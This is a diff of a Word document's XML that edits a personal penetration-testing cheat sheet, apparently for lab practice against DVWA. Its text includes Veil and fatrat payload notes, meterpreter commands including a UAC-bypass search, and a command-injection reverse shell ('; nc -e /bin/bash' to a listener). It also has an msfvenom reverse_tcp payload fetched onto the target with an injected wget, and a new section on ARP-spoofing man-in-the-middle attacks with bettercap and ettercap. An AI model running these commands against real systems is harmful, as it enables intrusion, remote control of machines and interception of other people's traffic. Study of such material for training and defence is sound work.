-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> payload</w:t>
+              <w:t>Veil – generating powershell payload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5074,15 +4074,7 @@
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Note: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fatrat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – check it out in google and follow instructions</w:t>
+              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5122,11 +4114,9 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>getuid</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -5195,36 +4185,21 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL meterpreter</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> &gt; </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pwd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: pwd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: dir</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -5260,28 +4235,12 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Some of the command in, when </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>your</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> in windows 10 machine</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;download {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fileName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t>Some of the command in, when your in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {fileName}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5289,15 +4248,7 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>upload {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fileName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t>upload {fileName}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5340,15 +4291,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">&gt;search </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>bypassuac</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – user account control</w:t>
+              <w:t>&gt;search bypassuac – user account control</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5488,13 +4431,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dirb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>&lt;dirb</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve">     ----</w:t>
             </w:r>
@@ -5507,15 +4445,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dirb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">&lt;dirb </w:t>
             </w:r>
             <w:hyperlink w:history="1">
               <w:r>
@@ -5547,15 +4477,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dvwa</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> website 192.168.1.1;ls-la</w:t>
+              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5565,23 +4487,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>lvp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 12345</w:t>
+              <w:t>&gt;nc -lvp 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5591,15 +4497,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">192.168.1.1; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -e /bin/bash 192.168.1.85 12345</w:t>
+              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5620,31 +4518,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -p python/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
+              <w:t>&gt;msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -5653,27 +4527,13 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>&gt;s</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>udo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> service apache2 start</w:t>
+              <w:t>udo service apache2 start</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5690,61 +4550,33 @@
               </w:rPr>
               <w:t>&gt;</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>sudo service apache2 restart</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve"> service apache2 restart</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:color w:val="111111"/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
+              <w:t>&gt;sudo service apache2 stop</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
               <w:t>&gt;</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:color w:val="111111"/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:color w:val="111111"/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> service apache2 stop</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
             <w:r>
               <w:t>192.168.1.1</w:t>
             </w:r>
@@ -5765,28 +4597,12 @@
           <w:p/>
           <w:p>
             <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>wget</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.1.85/tester.py</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>wget</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.1.9/tester.py</w:t>
+              <w:t>&gt;wget 192.168.1.85/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;;wget 192.168.1.9/tester.py</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5996,15 +4812,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Python -m </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>SimpleHTTPServer</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">Python -m SimpleHTTPServer </w:t>
             </w:r>
             <w:r>
               <w:t>{PORT}</w:t>
@@ -6143,71 +4951,233 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Man In The Middle Attack</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NOTE: Need to be ROOT USER</w:t>
+            </w:r>
+            <w:r>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>You need install bettercap in Kali</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;apt-get install betterca</w:t>
+            </w:r>
+            <w:r>
+              <w:t>p</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;bettercap</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t>help net.probe</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;net.probe on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>&gt;help arp.spoof</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;set arp.spoof.fullduplex true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;set arp.spoof.targets {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t>help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;set net.sniff.local true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;arp.spoof on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;net.sniff on</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Note: If you want to run previous – You need to create a sniff.cap</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;bettercap -iface eth0 -caplet sniff.cap</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Alternative: ETTERCAP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;cat /proc/sys/net/ipv4/ip_forward</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Note: If its enable packet forwarding 0 or 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Note: To start</w:t>
+            </w:r>
+            <w:r>
+              <w:t>, It will pop a window</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;Ettercap -G</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Can code using scapy instead of python</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -8606,6 +7576,230 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="02193688"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3D4AB526"/>
+    <w:lvl w:ilvl="0" w:tplc="3168EDCC">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="04380DAD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="20968F74"/>
+    <w:lvl w:ilvl="0" w:tplc="F232FA4E">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="18262D52"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1AAF4B0"/>
@@ -8694,7 +7888,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1E875223"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="656431E0"/>
@@ -8783,7 +7977,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="24F21451"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="033ECDDE"/>
@@ -8895,7 +8089,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3509666A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9CD64556"/>
@@ -8984,7 +8178,119 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="441C32AE"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B46E632C"/>
+    <w:lvl w:ilvl="0" w:tplc="B2B44D10">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
